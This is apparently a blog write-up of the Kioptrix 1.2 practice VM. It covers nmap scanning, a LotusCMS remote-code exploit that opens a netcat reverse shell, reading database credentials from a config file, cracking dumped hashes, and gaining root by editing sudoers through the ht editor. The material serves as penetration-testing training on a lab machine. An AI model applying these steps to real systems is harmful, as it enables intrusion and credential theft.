First, do a netdiscover to figure out which IP address hosts the Kioptrix Level 1.2 machine.
I have found out that machine's address is: 192.168.1.76
After an nmap scan of the machine using:
nmap -A -sV -p- 192.168.1.76, I get these results.
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-12 20:23 EDT Nmap scan report for 192.168.1.76 Host is up (0.00083s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA) |_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Ligoat Security - Got Goat? Security ... MAC Address: 00:0C:29:79:5B:BF (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.83 ms 192.168.1.76 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.34 seconds
It looks like we would have to map the ip address, 192.168.1.76 to kioptrix3.com
Let's modify /etc/hosts.
To do so, by doing a nano and then by adding the lines:
www.kioptrix3.com 192.168.1.76
After, do a /etc/init.d/networking restart to restart the networking services.
When we get to the site, www.kioptrix3.com, we can find out that the CMS used for the site is LotusCMS
Website for exploitation: https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh
Let's use the exploit saved to our Kali.
I will now run the exploit followed by the domain I would like to connect to, which is 192.168.1.76, by using:
./lotusRCE.sh www.kioptrix.com
On one window, I would have a netcat listener listening at port 1234.
On the other window, I would have a RCE exploit inject a reverse shell using my LHOST, which is 192.168.1.97 and LPORT 1234.
Now, I can back connect through this method, which is netcat -e.
Now, let's do some simple recon on the host.
hostname
Kioptrix3
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
And, now if I do a /etc/*release*, here is what I get back.
cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
Now, I would want to list the users available on the system.
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbashNow, we would like to grasp the ./bash_history from loneferret to see if we can get any juicy details.
ls -latr
total 64
-rwxrwxr-x 1 root root 26275 Jan 12 2011 checksec.sh
-rw-r--r-- 1 loneferret loneferret 586 Apr 11 2011 .profile
-rw-r--r-- 1 loneferret loneferret 2940 Apr 11 2011 .bashrc
-rw-r--r-- 1 loneferret loneferret 220 Apr 11 2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret 0 Apr 11 2011 .sudo_as_admin_successful
drwx------ 2 loneferret loneferret 4096 Apr 14 2011 .ssh
-rw------- 1 root root 15 Apr 15 2011 .nano_history
drwxr-xr-x 5 root root 4096 Apr 16 2011 ..
-rw-r--r-- 1 root root 224 Apr 16 2011 CompanyPolicy.README
drwxr-xr-x 3 loneferret loneferret 4096 Apr 17 2011 .
-rw-r--r-- 1 loneferret users 13 Apr 18 2011 .bash_history
Looking into the .bash_history, I get:
cat .bash_history
sudo ht
exit
I also see something very interesting while reading CompanyPolicy.README
cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
Let's get a more advanced (tty) shell by doing:
python -c 'import pty; pty.spawn("/bin/sh")'
Now, let's check out the folders and see if we can get any sensitive information.
cd gallery
$ ls
ls
BACK gfooter.php logout.php readme.html tags.php
db.sql gfunctions.php p.php recent.php themes
g.php gheader.php photos register.php version.txt
gadmin index.php photos.php scopbin vote.php
gallery.php install.BAK post_comment.php search.php
gconfig.php login.php profile.php slideshow.php
$ cat gconfig.php
cat gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
// Setting Details -------------------------------------------------
if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}
}
}
?>
From this .php code, we can see that we have sensitive information in hand such as the username, which is root and the password fuckeyou.
Let's now login to mysql and see what we can find.
$ mysql -u root -p
mysql -u root -p
Enter password: fuckeyou
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| gallery |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use gallery;
use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> use gallery;
use gallery;
Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_gallery |
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
7 rows in set (0.00 sec)
mysql> select * from dev_accounts;
select * from dev_accounts;
+----+------------+----------------------------------+
| id | username | password |
+----+------------+----------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.09 sec)
Aha. Now, we have the password hash for loneferret, the user.
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| 1 | admin | n0t7t1k4 | superuser | Super | User | | 1302628616 | | 1 | | |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.01 sec)
Instead of cracking hash locally, let's see if we can crack it faster using www.crackstation.net
We get the result, starwars, as the password.
Now, we get a chance to ssh into the server using the credentials we have just found.
user: loneferret
password: starwars
ssh loneferret@192.168.1.76
Then type starwars as the password.
Do a sudo -l to see which programs run as root.
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
Next, edit the file of your choice with ht
Now, type in sudo ht
Go to File and then navigate to /etc/sudoers.
For privilege escalation, make sure you add /bin/bash to the line of:
loneferret.
Now, we can take advantage of this condition and escalate to a r00t shell by doing:
sudo /bin/bash
Now, we have a root shell.
loneferret@Kioptrix3:~$ sudo /bin/bash
root@Kioptrix3:~# whoami
root
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:~# cd /root
root@Kioptrix3:/root# ls
Congrats.txt ht-2.0.18
root@Kioptrix3:/root# cat Congrats.txt
We are then rewarded by a Congrats.txt message.
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
Happy Rooting. :)
--Nathe
No comments:
Post a Comment